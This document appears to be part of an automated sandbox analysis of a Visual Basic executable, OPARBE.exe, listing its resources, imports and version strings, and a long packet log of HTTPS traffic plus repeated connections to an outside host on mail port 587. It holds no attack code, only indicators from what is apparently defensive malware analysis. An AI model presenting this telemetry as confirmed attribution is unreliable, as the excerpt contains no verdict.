.rsrc	0x17000	0x5a4	0x1000	False	0.1826171875	data	1.71136635862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x173bc	0x1e8	data
RT_GROUP_ICON	0x173a8	0x14	data
RT_VERSION	0x170f0	0x2b8	COM executable for DOS	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	OPARBE
FileVersion	1.00
CompanyName	Mummys Technology
Comments	Mummys Technology
ProductName	Mummys Technology
ProductVersion	1.00
FileDescription	Mummys Technology
OriginalFilename	OPARBE.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 15:33:44.572319031 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.612984896 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.613104105 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.613687992 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.655802011 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662863970 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662900925 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662920952 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662941933 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662962914 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.662972927 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.662986040 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.663006067 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.663026094 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.700042963 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.743093014 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.743417025 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.744574070 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.789469957 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.967124939 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.967187881 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.967230082 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.967289925 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.967339039 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.968014956 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.968048096 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.968082905 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.968112946 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.971024990 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.971055984 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.971136093 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.971160889 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.973953009 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.973983049 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.974102974 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.974131107 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.976912975 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.976943016 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.976999044 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.979947090 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.979976892 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.980098009 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.982877970 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.982914925 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.982986927 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.983010054 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:44.985869884 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.985908985 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:44.985985994 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.008136988 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.008222103 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.008260965 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.008327007 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.010838985 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.010931015 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.011029005 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.012511015 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.012556076 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.012586117 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.012609005 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.015357018 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.015404940 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.015465021 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.015489101 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.018477917 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.018521070 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.018738985 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.021447897 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.021478891 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.021548986 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.024266005 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.024286032 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.024363995 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.027165890 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.027188063 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.027245998 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.030052900 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.030071020 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.030354977 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.032716990 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.032752991 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.032851934 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.035206079 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.035238028 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.035271883 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.035298109 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.037623882 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.037648916 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.037714005 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.040081024 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.040105104 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.040188074 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.042586088 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.042644024 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.042689085 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.042738914 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.044986963 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.045033932 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.045141935 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.047472000 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.047504902 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.047548056 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.047583103 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.050054073 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.050084114 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.050143957 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.050167084 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.052448034 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.052469969 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.052552938 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.053968906 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.054039001 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.054069042 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.054135084 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.055594921 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.055625916 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.055723906 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.057173014 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.057198048 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.057307959 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.057326078 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.058907032 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.058934927 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.059027910 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.059070110 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.060340881 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.060369968 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.060411930 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.060431957 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.061899900 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.061933994 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.062038898 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.063518047 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.063538074 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.063591003 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.063611031 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.065074921 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.065092087 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.065155983 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.066639900 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.066658974 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.066740036 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.068305016 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.068324089 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.068402052 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.069824934 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.069843054 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.069916964 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.069952011 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.071444035 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.071461916 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.071552992 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.072985888 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.073008060 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.073565006 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.074595928 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.074619055 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.074675083 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.074702978 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.076193094 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.076220036 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.076317072 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.077876091 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.077898979 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.077986956 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.078006983 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.079358101 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.079382896 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.079430103 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.079454899 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.080926895 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.080951929 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.080995083 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.081044912 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.082500935 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.082519054 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.082592010 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.084012985 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.084033012 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.084100962 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.085588932 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.085608006 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.085688114 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.086941957 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.086965084 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.087052107 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.088449001 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.088485956 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.088534117 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.088587046 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.089803934 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.089833975 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.089924097 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.089982033 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.091119051 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.091150045 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.091185093 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.091213942 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.092489004 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.092516899 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.092565060 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.092586994 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.093827963 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.093853951 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.093924046 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.095163107 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.095192909 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.095283985 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.096467972 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.096502066 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.096560955 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.096606016 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.097363949 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.097414970 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.097467899 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.097510099 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.098280907 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.098308086 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.098351955 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.098409891 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.099088907 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.099112034 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.099208117 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.099991083 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.100018024 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.100068092 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.100112915 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.100860119 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.100878000 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.100930929 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.100966930 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.101758957 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.101785898 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.101946115 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.102600098 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.102626085 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.102669954 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.102705956 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.103480101 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.103507996 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.103566885 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.103585005 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.104270935 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.104295015 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.104342937 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.104383945 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.105081081 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.105108023 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.105180979 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.105214119 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.105912924 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.105937958 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.106029987 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.106714964 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.106744051 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.106827974 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.107517958 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.107549906 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.107623100 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.108316898 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.108350039 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.108432055 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.109077930 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.109111071 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.109163046 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.109236956 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.109800100 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.109842062 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.109870911 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.109899044 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.110651016 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.110667944 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.110733986 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.110770941 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.111313105 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.111332893 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.111376047 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.111403942 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.112073898 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.112091064 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.112154007 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.112814903 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.112833023 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.112904072 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.113539934 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.113559961 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.113620996 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.113651037 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.114270926 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.114289045 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.114356995 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.115027905 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.115056992 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.115103006 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.115149021 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.115711927 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.115741014 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.115794897 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.115842104 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.116684914 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.116710901 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.116796970 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.117130041 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.117162943 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.117228031 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.117918015 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.117948055 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.118031025 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.118568897 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.118601084 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.118678093 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.119280100 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.119311094 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.119395971 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.119987011 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.120014906 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.120074034 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:33:45.120759010 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:33:45.120821953 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:35:13.195055962 CEST	49764	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:16.200587034 CEST	49764	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:22.216948032 CEST	49764	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:33.296546936 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:35:33.337301016 CEST	443	49745	216.58.212.129	192.168.2.4
May 4, 2021 15:35:33.337415934 CEST	49745	443	192.168.2.4	216.58.212.129
May 4, 2021 15:35:34.590173960 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:37.593170881 CEST	49765	587	192.168.2.4	46.16.61.250
